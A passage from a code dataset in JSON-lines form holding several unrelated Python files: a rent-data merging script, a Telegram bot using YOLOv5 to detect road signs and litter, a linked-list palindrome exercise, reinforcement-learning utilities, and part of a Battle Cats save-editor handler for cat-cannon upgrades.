= None\n if len(loaded_data_4) > 0:\n data_4 = loaded_data_4.pop(0)\n else:\n data_4 = None\n if len(loaded_data_5) > 0:\n data_5 = loaded_data_5.pop(0)\n else:\n data_5 = None\n if len(loaded_data_6) > 0:\n data_6 = loaded_data_6.pop(0)\n else:\n data_6 = None\n if len(loaded_data_7) > 0:\n data_7 = loaded_data_7.pop(0)\n else:\n data_7 = None\n if len(loaded_data_8) > 0:\n data_8 = loaded_data_8.pop(0)\n else:\n data_8 = None\n if len(loaded_data_9) > 0:\n data_9 = loaded_data_9.pop(0)\n else:\n data_9 = None\n if len(loaded_data_10) > 0:\n data_10 = loaded_data_10.pop(0)\n else:\n data_10 = None\n if len(loaded_data_11) > 0:\n data_11 = loaded_data_11.pop(0)\n else:\n data_11 = None\n if len(loaded_data_12) > 0:\n data_12 = loaded_data_12.pop(0)\n else:\n data_12 = None\n if len(loaded_data_13) > 0:\n data_13 = loaded_data_13.pop(0)\n else:\n data_13 = None\n if len(loaded_data_14) > 0:\n data_14 = loaded_data_14.pop(0)\n else:\n data_14 = None\n if len(loaded_data_15) > 0:\n data_15 = loaded_data_15.pop(0)\n else:\n data_15 = None\n if len(loaded_data_16) > 0:\n data_16 = loaded_data_16.pop(0)\n else:\n data_16 = None\n\n run = 0\n while run < len(loaded_data_1) and (data_2 is not None or data_3 is not None or data_4 is not None \\\n or data_5 is not None or data_6 is not None or data_7 is not None or data_8 is not None \\\n or data_9 is not None or data_10 is not None or data_11 is not None or data_12 is not None):\n data_1 = loaded_data_1[run]\n if data_2 is not None and data_1[\"Latitude\"] == data_2[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_2[\"Longitude\"] and data_1[\"livingSpace\"] == data_2[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_2[\"roomCount\"] and data_1[\"propertyAge\"] == data_2[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_2[\"houseType\"]:\n if \"id\" in data_1:\n data_2[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_2[\"id\"] = highest_id\n data_list.append(data_2)\n data_2 = None\n if data_3 is not None and data_1[\"Latitude\"] == data_3[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_3[\"Longitude\"] and data_1[\"livingSpace\"] == data_3[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_3[\"roomCount\"] and data_1[\"propertyAge\"] == data_3[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_3[\"houseType\"]:\n if \"id\" in data_1:\n data_3[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_3[\"id\"] = highest_id\n data_list.append(data_3)\n data_3 = None\n if data_4 is not None and data_1[\"Latitude\"] == data_4[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_4[\"Longitude\"] and data_1[\"livingSpace\"] == data_4[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_4[\"roomCount\"] and data_1[\"propertyAge\"] == data_4[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_4[\"houseType\"]:\n if \"id\" in data_1:\n data_4[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_4[\"id\"] = highest_id\n data_list.append(data_4)\n data_4 = None\n if data_5 is not None and data_1[\"Latitude\"] == data_5[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_5[\"Longitude\"] and data_1[\"livingSpace\"] == data_5[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_5[\"roomCount\"] and data_1[\"propertyAge\"] == data_5[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_5[\"houseType\"]:\n if \"id\" in data_1:\n data_5[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_5[\"id\"] = highest_id\n data_list.append(data_5)\n data_5 = None\n if data_6 is not None and data_1[\"Latitude\"] == data_6[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_6[\"Longitude\"] and data_1[\"livingSpace\"] == data_6[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_6[\"roomCount\"] and data_1[\"propertyAge\"] == data_6[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_6[\"houseType\"]:\n if \"id\" in data_1:\n data_6[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_6[\"id\"] = highest_id\n data_list.append(data_6)\n data_6 = None\n if data_7 is not None and data_1[\"Latitude\"] == data_7[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_7[\"Longitude\"] and data_1[\"livingSpace\"] == data_7[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_7[\"roomCount\"] and data_1[\"propertyAge\"] == data_7[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_7[\"houseType\"]:\n if \"id\" in data_1:\n data_7[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_7[\"id\"] = highest_id\n data_list.append(data_7)\n data_7 = None\n if data_8 is not None and data_1[\"Latitude\"] == data_8[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_8[\"Longitude\"] and data_1[\"livingSpace\"] == data_8[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_8[\"roomCount\"] and data_1[\"propertyAge\"] == data_8[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_8[\"houseType\"]:\n if \"id\" in data_1:\n data_8[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_8[\"id\"] = highest_id\n data_list.append(data_8)\n data_8 = None\n if data_9 is not None and data_1[\"Latitude\"] == data_9[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_9[\"Longitude\"] and data_1[\"livingSpace\"] == data_9[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_9[\"roomCount\"] and data_1[\"propertyAge\"] == data_9[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_9[\"houseType\"]:\n if \"id\" in data_1:\n data_9[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_9[\"id\"] = highest_id\n data_list.append(data_9)\n data_9 = None\n if data_10 is not None and data_1[\"Latitude\"] == data_10[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_10[\"Longitude\"] and data_1[\"livingSpace\"] == data_10[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_10[\"roomCount\"] and data_1[\"propertyAge\"] == data_10[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_10[\"houseType\"]:\n if \"id\" in data_1:\n data_10[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_10[\"id\"] = highest_id\n data_list.append(data_10)\n data_10 = None\n if data_11 is not None and data_1[\"Latitude\"] == data_11[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_11[\"Longitude\"] and data_1[\"livingSpace\"] == data_11[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_11[\"roomCount\"] and data_1[\"propertyAge\"] == data_11[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_11[\"houseType\"]:\n if \"id\" in data_1:\n data_11[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_11[\"id\"] = highest_id\n data_list.append(data_11)\n data_11 = None\n if data_12 is not None and data_1[\"Latitude\"] == data_12[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_12[\"Longitude\"] and data_1[\"livingSpace\"] == data_12[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_12[\"roomCount\"] and data_1[\"propertyAge\"] == data_12[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_12[\"houseType\"]:\n if \"id\" in data_1:\n data_12[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_12[\"id\"] = highest_id\n data_list.append(data_12)\n data_12 = None\n if data_13 is not None and data_1[\"Latitude\"] == data_13[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_13[\"Longitude\"] and data_1[\"livingSpace\"] == data_13[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_13[\"roomCount\"] and data_1[\"propertyAge\"] == data_13[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_13[\"houseType\"]:\n if \"id\" in data_1:\n data_13[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_13[\"id\"] = highest_id\n data_list.append(data_13)\n data_13 = None\n if data_14 is not None and data_1[\"Latitude\"] == data_14[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_14[\"Longitude\"] and data_1[\"livingSpace\"] == data_14[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_14[\"roomCount\"] and data_1[\"propertyAge\"] == data_14[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_14[\"houseType\"]:\n if \"id\" in data_1:\n data_14[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_14[\"id\"] = highest_id\n data_list.append(data_14)\n data_14 = None\n if data_15 is not None and data_1[\"Latitude\"] == data_15[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_15[\"Longitude\"] and data_1[\"livingSpace\"] == data_15[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_15[\"roomCount\"] and data_1[\"propertyAge\"] == data_15[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_15[\"houseType\"]:\n if \"id\" in data_1:\n data_15[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_15[\"id\"] = highest_id\n data_list.append(data_15)\n data_15 = None\n if data_16 is not None and data_1[\"Latitude\"] == data_16[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_16[\"Longitude\"] and data_1[\"livingSpace\"] == data_16[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_16[\"roomCount\"] and data_1[\"propertyAge\"] == data_16[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_16[\"houseType\"]:\n if \"id\" in data_1:\n data_16[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_16[\"id\"] = highest_id\n data_list.append(data_16)\n data_16 = None\n run += 1\n data_list.extend(loaded_data_1)\n save_to_json(data_list, output_filename)\n\n\ndef remove_double(data_list):\n result_list = list()\n double_data_count = 0\n\n while len(data_list) > 0:\n run = 0\n data = data_list.pop(0)\n while run < len(data_list):\n d = data_list[run]\n if data is not None and data[\"Latitude\"] == d[\"Latitude\"] and data[\"Longitude\"] == d[\"Longitude\"] \\\n and data[\"livingSpace\"] == d[\"livingSpace\"] and data[\"roomCount\"] == d[\"roomCount\"] \\\n and data[\"propertyAge\"] == d[\"propertyAge\"] and data[\"houseType\"] == d[\"houseType\"]:\n data_list.pop(run)\n double_data_count += 1\n else:\n run += 1\n result_list.append(data)\n print(\"Duplicates: \" + str(double_data_count))\n return result_list\n\n\ndef create_future_data(data):\n data_list_2022 = list()\n data_list_2023 = list()\n data_list_2024 = list()\n data_list_2025 = list()\n\n for d in data:\n d.pop(\"rent\")\n d[\"year\"] = 22\n data_list_2022.append(d.copy())\n d[\"year\"] = 23\n data_list_2023.append(d.copy())\n d[\"year\"] = 24\n data_list_2024.append(d.copy())\n d[\"year\"] = 25\n data_list_2025.append(d.copy())\n\n save_to_json(data_list_2022, '../Historical_Data/trainingData_fut_2022.json')\n save_to_json(data_list_2023, '../Historical_Data/trainingData_fut_2023.json')\n save_to_json(data_list_2024, '../Historical_Data/trainingData_fut_2024.json')\n save_to_json(data_list_2025, '../Historical_Data/trainingData_fut_2025.json')\n\n\nif __name__ == \"__main__\":\n # Erstelle Trainingsvariablen aus Daten\n # main()\n\n main_2()\n\n# Erstellen der Zukünftigen Rohdaten\n #data = load_data('../Historical_Data/trainingData_located2021_2.json')\n #create_future_data(data)\n\n# Gleiche Immobilenstammdaten aus den verschiedenen Jahren werden mit der salben ID versehen um sie\n# folgend und eine 3d Liste zusammenführen zu können.\n# _build_raw_data_2()\n# data = load_data('final_data_2_timeline.json')\n# i = 0\n# for d in data:\n# if not 'id' in d:\n# i += 1\n# print(\"No ID: \" + str(i))\n\n# num_list = list()\n# for i in range(0, 117360):\n# num_list.append(0)\n\n# for d in data:\n# if 'id' in d:\n# num_list[d['id']] += 1\n# print(num_list)\n\n# Löschen doppelter Werte in Liste\n# data = load_data('../Historical_Data/trainingData_located2021.json')\n# print(len(data))\n# data = remove_double(data)\n# save_to_json(data, '../Historical_Data/trainingData_located2021_2.json')\n\n# Aufteilen in Training und Test Daten\n# total_data_list = load_data('final_data_2.json')\n# training_data, test_data = _split_in_training_and_test_data(total_data_list)\n# save_to_json(training_data, 'training_data_2.json')\n# save_to_json(test_data, 'test_data_2.json')\n","repo_name":"Allibibo/KI_mietpreis_prognose","sub_path":"City_Data/Attribute.py","file_name":"Attribute.py","file_ext":"py","file_size_in_byte":27003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"74580756994","text":"from io import BytesIO\nimport logging\nfrom datetime import datetime\n\nimport cv2\nimport torch\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\nfrom telegram.ext import *\n\nDEVICE = 'cpu'\nTHICKNESS = 2\nFONT_SCALE = 1\nCOLOR = (255, 0, 0)\nLIST_OBJ = ['знак', 'мусор']\nFONT = cv2.FONT_HERSHEY_COMPLEX\nWEIGHTS = 'PATH_YOUR_MODEL'\nMODEL_YOLO = torch.hub.load('ultralytics/yolov5', 'custom', WEIGHTS, device=DEVICE, force_reload=True)\nMODEL_YOLO.conf = 0.8\n\nwith open('token.txt', 'r') as f:\n TOKEN = f.read()\n\n\ndef start(update, context):\n update.message.reply_text('Приветствую! Я бот для нахождения дорожных знаков и мусора для СКПДИ. '\n 'Отправь фото или видео и получи ответ')\n\n\ndef help(update, context):\n update.message.reply_text(\"\"\"\n /start - Вступительная информация\n /help - Показать это сообщение\n \"\"\")\n\n\ndef handle_message(update, context):\n update.message.reply_text('Отправь фото')\n\n\ndef handle_photo(update, context):\n start_time = datetime.now()\n file = context.bot.get_file(update.message.photo[-1].file_id)\n f = BytesIO(file.download_as_bytearray())\n file_bytes = np.asarray(bytearray(f.read()), dtype=np.uint8)\n img = cv2.imdecode(file_bytes, cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n result = list(MODEL_YOLO(img).pred[0].numpy())\n objs = []\n if len(result) == 0:\n update.message.reply_text('На фото не обнаруженно дорожных знаков или мусора')\n else:\n for obj in result:\n x_up, y_up, x_low, y_low = obj[:4]\n variance = round(obj[4] + 0, 2)\n id_ = int(obj[5])\n objs.append(LIST_OBJ[id_])\n text = f'{LIST_OBJ[id_]} - {variance}'\n text_size, _ = cv2.getTextSize(text, FONT, FONT_SCALE, THICKNESS)\n text_w, text_h = text_size\n img_response = cv2.rectangle(img, (int(x_up), int(y_up - text_h)), (int(x_low), int(y_up)), (0, 0, 255), -1)\n img_response = cv2.rectangle(img_response, (int(x_up), int(y_up)),\n (int(x_low), int(y_low)), (0, 0, 255), 2)\n img_response = cv2.putText(img_response, text, (int(x_up), int(y_up - (img.shape[0] // 100))),\n FONT, FONT_SCALE, (255, 0, 0), THICKNESS)\n\n pil_image = Image.fromarray(img_response)\n bio = BytesIO()\n pil_image.save(bio, 'JPEG')\n bio.seek(0)\n\n context.bot.send_photo(update.message.chat.id, bio)\n # context.bot.send_video(chat_id=update.message.chat_id, video=open('/home/artemii_vibs/PycharmProjects/tg_bot_skpdi/file_16.mp4_new.mp4', 'rb'), supports_streaming=True)\n context.bot.send_message(update.message.chat.id, f\"\"\"\n На фото обнаруженны:\n Дорожные знаки - {objs.count(LIST_OBJ[0])}\n Мусор - {objs.count(LIST_OBJ[1])}\n \"\"\")\n time_answer = ((datetime.now() - start_time).microseconds) / 1000000\n logging.info(f\"\"\"\n \nCompleted send photo with detect: \nДоро��ные знаки - {objs.count(LIST_OBJ[0])} \nМусор - {objs.count(LIST_OBJ[1])}\nSend answer to {update.message.from_user.id}\n {update.message.from_user.first_name}\n {update.message.from_user.last_name}\n {update.message.from_user.username}\nTime answer seconds - {time_answer}\n\n\"\"\")\n\n\ndef handle_video(update, context):\n start_time = datetime.now()\n file = context.bot.get_file(update.message.video).download()\n cap = cv2.VideoCapture(file)\n count_frames_video = round(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n size = (width, height)\n fps_video = round(cap.get(cv2.CAP_PROP_FPS))\n name_video = f'{file}_new.mp4'\n out = cv2.VideoWriter(name_video, cv2.VideoWriter_fourcc(*'DIVX'), fps_video, size, 0)\n for _ in tqdm(range(count_frames_video), desc=''):\n success, img = cap.read()\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n result = list(MODEL_YOLO(img).pred[0].numpy())\n for obj in result:\n x_up, y_up, x_low, y_low = obj[:4]\n variance = round(obj[4] + 0, 2)\n id_ = int(obj[5])\n text = f'{LIST_OBJ[id_]} - {variance}'\n text_size, _ = cv2.getTextSize(text, FONT, FONT_SCALE, THICKNESS)\n text_w, text_h = text_size\n img = cv2.rectangle(img, (int(x_up), int(y_up - text_h)), (int(x_low), int(y_up)), (0, 0, 255), -1)\n img = cv2.rectangle(img, (int(x_up), int(y_up)),\n (int(x_low), int(y_low)), (0, 0, 255), 2)\n img = cv2.putText(img, text, (int(x_up), int(y_up - (img.shape[0] // 100))),\n FONT, FONT_SCALE, (255, 0, 0), THICKNESS)\n\n out.write(img)\n out.release()\n context.bot.send_video(chat_id=update.message.chat_id, video=open(name_video, 'rb'), supports_streaming=True)\n\n\n\nupdater = Updater(TOKEN, use_context=True)\ndp = updater.dispatcher\n\ndp.add_handler(CommandHandler('start', start))\ndp.add_handler(MessageHandler(Filters.text, handle_message))\ndp.add_handler(MessageHandler(Filters.photo, handle_photo))\ndp.add_handler(MessageHandler(Filters.video, handle_video))\n\nupdater.start_polling()\nupdater.idle()\n","repo_name":"Leotiv-Vibs/tg_bot","sub_path":"tg_bot.py","file_name":"tg_bot.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4290871639","text":"'''\r\nAdam Roy\r\nFINAL PROGRAM Part 4\r\nCSCI 161\r\n'''\r\n#ver 1.8\r\nclass Node:\r\n def __init__(self,data):\r\n self.data = data\r\n self.point = None\r\ndef is_palindrome(head):\r\n s = head\r\n stack = []\r\n ispalin = True\r\n while s != None:\r\n stack.append(s.data)\r\n s = s.point\r\n while head != None:\r\n i = stack.pop()\r\n if head.data == i:\r\n ispalin = True\r\n else:\r\n ispalin = False\r\n break\r\n head = head.point\r\n return ispalin\r\nList1 = [1,2,2,1]\r\nList2 = [1,2,3,4,5]\r\na = Node(1)\r\nb = Node(2)\r\nc = Node(2)\r\nd = Node(1)\r\na.point = b\r\nb.point = c\r\nc.point = d\r\nd.point = None\r\nresult = is_palindrome(a)\r\nprint(List1)\r\nNL1 = List1[::-1]\r\nprint(NL1)\r\nprint('Is palindrome: ', result)\r\n\r\na = Node(1)\r\nb = Node(2)\r\nc = Node(3)\r\nd = Node(4)\r\ne = Node(5)\r\na.point = b\r\nb.point = c\r\nc.point = d\r\nd.point = e\r\ne.point = None\r\nresult = is_palindrome(a)\r\nprint()\r\nprint(List2)\r\nNL2 = List2[::-1]\r\nprint(NL2)\r\nprint('Is palindrome: ', result)","repo_name":"adamr814/College_Course_Code","sub_path":"CSCI 161/Final Exam/Part4.py","file_name":"Part4.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25300097130","text":"import torch.optim as optim\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam\nfrom tqdm import tqdm\nimport torch.nn.functional as F\nimport numpy as np\nimport random \nimport gym\nfrom torch.distributions.categorical import Categorical\nfrom torch.distributions.normal import Normal\nfrom torch.distributions.multivariate_normal import MultivariateNormal\nfrom torch.distributions.kl import kl_divergence\nimport multiprocessing as mp\nfrom functools import partial\nfrom IPython.display import clear_output\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nfrom collections import deque\nimport copy\nimport math\nimport gym\nfrom gym import spaces, logger\nfrom gym.utils import seeding\nimport numpy as np\nfrom gym.envs.classic_control.cartpole import CartPoleEnv\n\nclass nCartPoleEnv(CartPoleEnv):\n def __init__(self):\n super(nCartPoleEnv,self).__init__()\n self.gravity = 9.8\n self.length = random.random() *2 # actually half the pole's length\n self.masspole = random.random()\n self.masscart = random.random()*5\n self.total_mass = (self.masspole + self.masscart)\n self.polemass_length = (self.masspole * self.length)\n self.tau = 0.02 # seconds between state updates\n self.kinematics_integrator = 'euler'\n def reset(self):\n obs = super().reset()\n self.length = random.random() *2\n self.masspole = random.random()\n self.masscart = random.random()*5\n self.total_mass = (self.masspole + self.masscart)\n self.polemass_length = (self.masspole * self.length)\n return obs\n \ndef conv(): return nn.Sequential(nn.Conv1d(2,2,kernel_size = 3, padding=1),nn.LeakyReLU(), nn.BatchNorm1d(2))\n\ndef information_radius(P,Q):\n mu = (P.loc+Q.loc)/2\n if type(P)==MultivariateNormal:\n C = (P.scale_tril+Q.scale_tril)/4\n M = MultivariateNormal(mu,C)\n else:\n std = ((P.variance+Q.variance)/4).sqrt()\n M = Normal(mu,std)\n return (kl_divergence(P,M)+kl_divergence(Q,M))/2\n\ndef j_divergence(P,Q):\n return (kl_divergence(P,Q)+kl_divergence(Q,P))/2\n\ndef ag_divergence(P,Q):\n mu = (P.loc+Q.loc)/2\n if type(P)==MultivariateNormal:\n C = (P.scale_tril+Q.scale_tril)/4\n M = MultivariateNormal(mu,C)\n else:\n std = ((P.variance+Q.variance)/4).sqrt()\n M = Normal(mu,std)\n return (kl_divergence(M,P)+kl_divergence(M,Q))/2\n\nclass SILogStd(nn.Module):\n def __init__(self,ni,nh):\n super(SILogStd,self).__init__()\n self.value = nn.Parameter(torch.ones(nh)*1e-3)\n def forward(self,x): return self.value\n \nclass SDLogStd(nn.Module):\n def __init__(self,ni,nh):\n super(SDLogStd,self).__init__()\n self.M = nn.Sequential(nn.Linear(ni,nh),\n nn.LeakyReLU(),\n nn.Linear(nh,nh))\n def forward(self,x):\n return self.M(x)\n \ndef reflect_major_diag(x):\n h,w = x.shape #assume square matrix\n y = x*torch.tensor(np.tri(h))\n return (y+y.T)/(torch.ones(h,w)+torch.eye(w))\n\nclass MixerMLP(nn.Module):\n def __init__(self,nh):\n super(MixerMLP,self).__init__()\n self.mlp = nn.ModuleList([nn.Linear(2,2),\n nn.Linear(nh,nh)])\n self.norm = nn.LayerNorm(nh)\n def forward(self,x):\n return self.norm(self.mlp[1](self.mlp[0](x.T).relu().T).relu())\n \nclass SICovarianceMatrix(nn.Module):\n def __init__(self,ni,nh):\n super(SICovarianceMatrix,self).__init__()\n self.value = nn.Parameter(torch.eye(nh))\n self.mask = torch.tensor(np.tri(nh),requires_grad=False)\n self.nh = nh\n def forward(self,x):\n L = self.value*self.mask\n L = torch.matmul(L,L.T)*self.mask+torch.eye(self.nh)\n return L.float()\n \nclass SDCovarianceMatrix(nn.Module):\n def __init__(self,ni,nh):\n super(SDCovarianceMatrix,self).__init__()\n self.L = nn.Sequential(nn.Linear(ni,nh),\n nn.ReLU())\n self.mask = torch.tensor(np.tri(nh),requires_grad=False)\n self.nh = nh\n init_weights(self)\n def forward(self,x):\n L = self.L(x).unsqueeze(-1)\n L = torch.matmul(L,L.T)\n L = L*self.mask+torch.eye(self.nh)\n return torch.matmul(L,L.T).float() \n \n \ndef set_seed(env=None,proc_num=1):\n random.seed(proc_num)\n torch.manual_seed(proc_num)\n np.random.seed(proc_num)\n if env is not None: env.seed(proc_num)\n\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, mean=0., std=0.1)\n nn.init.constant_(m.bias, 0.1)\n\ndef batch_term(x,y,term=information_radius):\n score = 0\n for x_,y_ in zip(x,y):\n score += term(x_,y_).sum()\n return score/len(x)\n\ndef reshape(x):\n if len(x.shape)==1:\n x = x.unsqueeze(0) #singular batch \n return x\n \nclass Attention(nn.Module):\n def __init__(self,ni):\n super(Attention,self).__init__()\n self.key = nn.Linear(ni,ni)\n self.value = nn.Linear(ni,ni)\n self.query = nn.Linear(ni,ni)\n def forward(self,k,v,q,negate = False):\n [k,v,q] = [reshape(x) for x in [k,v,q]]\n mask = torch.bmm(self.query(q).unsqueeze(-1),self.key(k).unsqueeze(-1).transpose(1,-1)).softmax(1)\n if negate:\n mask = F.normalize(1-mask,1)\n return torch.bmm(mask, v.unsqueeze(-1)).squeeze()\n return torch.bmm(mask, v.unsqueeze(-1)).squeeze()\n \nclass LatentQuery(nn.Module):\n def __init__(self, nh):\n super(LatentQuery,self).__init__()\n self.query = nn.Parameter(torch.ones(nh).float())\n def forward(self,x):\n return self.query","repo_name":"domhuh/mixmaskac","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13701083499","text":"\"\"\"Handler for editing the ototo cat cannon\"\"\"\nfrom typing import Any, Optional\n\nfrom ... import user_input_handler, game_data_getter, csv_handler, helper\n\n\ndef get_canon_types(is_jp: bool) -> Optional[list[str]]:\n \"\"\"Get the cannon types\"\"\"\n\n file_data = game_data_getter.get_file_latest(\n \"resLocal\", \"CastleRecipeDescriptions.csv\", is_jp\n )\n if file_data is None:\n helper.error_text(\"Could not find CastleRecipeDescriptions.csv\")\n return None\n data = csv_handler.parse_csv(\n file_data.decode(\"utf-8\"),\n delimeter=helper.get_text_splitter(is_jp),\n )\n types: list[str] = []\n for cannon in data:\n types.append(cannon[1])\n return types\n\n\ndef get_cannon_maxes(is_jp: bool) -> Optional[dict[int, dict[int, int]]]:\n \"\"\"Get the cannon maxes\"\"\"\n file_data = game_data_getter.get_file_latest(\n \"DataLocal\", \"CastleRecipeUnlock.csv\", is_jp\n )\n if file_data is None:\n helper.error_text(\"Could not find CastleRecipeUnlock.csv\")\n return None\n data = helper.parse_int_list_list(csv_handler.parse_csv(file_data.decode(\"utf-8\")))\n maxes: dict[int, dict[int, int]] = {}\n for cannon in data:\n cannon_id = cannon[0]\n part = cannon[1]\n max_val = cannon[-1]\n if cannon_id not in maxes:\n maxes[cannon_id] = {}\n if part not in maxes[cannon_id]:\n maxes[cannon_id][part] = max_val\n elif max_val > maxes[cannon_id][part]:\n maxes[cannon_id][part] = max_val\n return maxes\n\n\ndef get_part_id_from_str(part: str) -> int:\n \"\"\"Get the part id from the string\"\"\"\n if part == \"effect\":\n return 0\n if part == \"foundation\":\n return 1\n if part == \"style\":\n return 2\n return 0\n\n\ndef get_max(\n part: str, cannon_id: int, cannon_maxes: dict[int, dict[int, int]]\n) -> Optional[int]:\n \"\"\"Get the max value for the part\"\"\"\n part_id = get_part_id_from_str(part)\n if cannon_id not in cannon_maxes:\n return None\n if part_id not in cannon_maxes[cannon_id]:\n return None\n return cannon_maxes[cannon_id][part_id]\n\n\ndef edit_cat_cannon(save_stats: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Handler for ototo cat cannon upgrades\"\"\"\n\n cannons: dict[int, dict[str, Any]] = save_stats[\"ototo_cannon\"]\n\n cannon_types = get_canon_types(helper.check_data_is_jp(save_stats))\n if cannon_types is None:\n return save_stats\n\n cannon_maxes = get_cannon_maxes(helper.check_data_is_jp(save_stats))\n if cannon_maxes is None:\n return save_stats\n\n extra_data: list[str] = []\n for i in range(len(cannon_types)):\n levels = cannons[i][\"levels\"]\n if i == 0:\n extra_data.append(f\"Level: &{levels['effect']+1}&\")\n continue\n string = \"\"\n for level_str, level in levels.items():\n part_id = get_part_id_from_str(level_str)\n if part_id == 0:\n level += 1\n string += f\"{level_str.title()}: &{level}&, \"\n string = string[:-2]\n string += f\" (Development: &{cannons[i]['unlock_flag']}&)\"\n extra_data.append(string)\n\n cannon_ids = user_input_handler.select_not_inc(cannon_types, extra_data=extra_data)\n if len(cannon_ids) > 1:\n individual = user_input_handler.ask_if_individual(\"Cat Cannons\")\n else:\n individual = True\n\n if individual:\n for cannon_id in cannon_ids:\n helper.colored_text(\n f\"Editing &{cannon_types[cannon_id]}&\", helper.WHITE, helper.GREEN\n )\n cannon = cannons[cannon_id]\n if cannon_id == 0:\n max = get_max(\"effect\", cannon_id, cannon_maxes)\n if max is None:\n continue\n level = user_input_handler.get_int(\n f\"Enter the level to upgrade the base to (Max &{max}&):\",\n )\n level -= 1\n level = helper.config_clamp(level, 0, max)\n cannon[\"levels\"][\"effect\"] = level\n continue\n develop_stage = (\n user_input_handler.colored_input(\n \"Do you want to set the stage of development (&1&) or the upgrade level? (&2&):\",\n )\n == \"1\"\n )\n if develop_stage:\n unlock_flag = user_input_handler.get_int(\n \"Enter the stage of development (1=effect, 2=foundation, 3=style):\",\n )\n unlock_flag = helper.config_clamp(unlock_flag, 0, 3)\n cannon[\"unlock_flag\"] = unlock_flag\n if unlock_flag != 3:\n for level_str in cannon[\"levels\"]:\n cannon[\"levels\"][level_str] = 0\n else:\n cannon[\"upgrade_flag\"] = 3\n for level_str in cannon[\"levels\"]:\n max = get_max(level_str, cannon_id, cannon_maxes)\n if max is None:\n continue\n part_id = get_part_id_from_str(level_str)\n level = 